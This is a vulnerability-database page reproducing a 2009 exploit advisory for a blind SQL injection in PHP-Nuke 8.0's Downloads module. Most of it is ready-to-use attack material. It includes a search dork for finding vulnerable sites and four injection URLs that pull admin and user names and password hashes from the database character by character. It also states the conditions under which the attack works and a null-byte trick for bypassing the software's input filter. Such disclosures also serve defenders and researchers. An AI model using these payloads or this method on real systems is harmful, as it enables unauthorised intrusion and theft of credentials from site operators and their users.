Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21224
HistoryJan 25, 2009 - 12:00 a.m.

PHP-Nuke 8.0 Downloads Blind Sql Injection

2009-01-2500:00:00
vulners.com
53
JSON

#####################################################################################

PHP-Nuke 8.0 Downloads Blind Sql Injection

#####################################################################################

#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################

#Download : http://phpnuke.org #

#Dork : inurl:modules.php?name=Downloads "PHP-Nuke" #

#####################################################################################

[Bug]

#Admin Username :
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password :
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username :
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password :
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*

#####################################################################################

[Note]

#1. magic_quotes_gpc = Off #
#2. register_globals = On #
#3. For using bug you must login via a simple user. #
#4. After using bug go to this url : #
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&[email protected]&title=zz&url=zz&description=zz
#5. I use ascii codes and null byte in url for bypass nuke security function #

please don't change ascii code and %00.

###################################### TNX GOD ######################################

JSON